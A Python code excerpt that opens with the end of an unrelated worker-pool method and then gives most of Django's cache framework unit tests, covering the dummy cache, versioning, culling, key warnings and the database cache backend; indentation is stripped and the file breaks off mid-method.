if any(platform in sys.platform for platform in ("win", "ios")) or self._processes_as_threads:
process_pool = multiprocessing.pool.ThreadPool
else:
process_pool = multiprocessing.pool.Pool
start = time.time()
pool = process_pool(processes=self._processes)
pool.imap_unordered(lambda f: f(), (self._process_worker for _ in range(self._processes)),
chunksize=self._processes)
pool.close()
pool.join()
pool.terminate()
self._complete.set()
self._function_arguments.stop()
self._function_arguments.join()
sync_thread.join()
self._running = False
return time.time() - start
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core.cache import cache, caches, CacheKeyWarning, InvalidCacheBackendError
from django.db import connection, router, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.utils import (IgnoreDeprecationWarningsMixin,
IgnorePendingDeprecationWarningsMixin)
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertEqual(cache.get("key"), None)
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, True)
self.assertEqual(cache.get("addkey1"), None)
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), None)
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), False)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, False)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), None)
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), None)
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), None)
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
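# For example, custom_key_func('answer', 'prefix', 2) builds the key
# 'CUSTOM-prefix-2-answer'.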
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = dict((k, base.copy()) for k in _caches_setting_base.keys())
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
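# For instance, caches_setting_for_tests(BACKEND='x.y.Z') yields one entry per
# alias in _caches_setting_base ('default', 'prefix', 'v2', ...), each a copy of
# `base` updated first with that alias's overrides and then with BACKEND='x.y.Z'.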
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertEqual(result, False)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertEqual(cache.get("does_not_exist"), None)
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertEqual(cache.has_key("hello1"), True)
self.assertEqual(cache.has_key("goodbye1"), False)
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertEqual("hello2" in cache, True)
self.assertEqual("goodbye2" in cache, False)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(cache.get("expire1"), None)
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertEqual(cache.has_key("expire3"), False)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertEqual(cache.get("key1"), None)
self.assertEqual(cache.get("key2"), None)
def test_long_timeout(self):
'''
Using a timeout greater than 30 days makes memcached think
it is an absolute expiration timestamp instead of a relative
offset. Test that we honour this convention. Refs #12399.
'''
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
'''
Passing in None into timeout results in a value that is cached forever
'''
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
'''
Passing in zero into timeout results in a value that is not cached
'''
cache.set('key1', 'eggs', 0)
self.assertEqual(cache.get('key1'), None)
cache.add('key2', 'ham', 0)
self.assertEqual(cache.get('key2'), None)
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertEqual(cache.get('key3'), None)
self.assertEqual(cache.get('key4'), None)
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count = count + 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def test_invalid_keys(self):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached does not allow whitespace or control characters in keys
cache.set('key with spaces', 'value')
self.assertEqual(len(w), 2)
self.assertIsInstance(w[0].message, CacheKeyWarning)
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
# memcached limits key length to 250
cache.set('a' * 251, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
finally:
cache.key_func = old_func
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertEqual(cache.get('answer1', version=2), None)
self.assertEqual(caches['v2'].get('answer1'), None)
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertEqual(caches['v2'].get('answer1', version=2), None)
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertEqual(cache.get('answer3'), None)
self.assertEqual(cache.get('answer3', version=1), None)
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertEqual(caches['v2'].get('answer3', version=1), None)
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertEqual(cache.get('answer4', version=2), None)
self.assertEqual(caches['v2'].get('answer4'), None)
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertEqual(caches['v2'].get('answer4', version=2), None)
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), None)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), None)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), None)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.get('answer', version=3), None)
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), None)
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2', version=3), None)
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertEqual(cache.get('answer', version=2), None)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(caches['custom_key'].get('answer1'), None)
self.assertEqual(caches['custom_key2'].get('answer1'), None)
caches['custom_key'].set('answer2', 42)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super call needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
stdout = six.StringIO()
management.call_command(
'createcachetable',
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
stdout = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertEqual(cache.get("key1"), None)
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
def test_createcachetable_observes_database_router(self):
old_routers = router.routers
try:
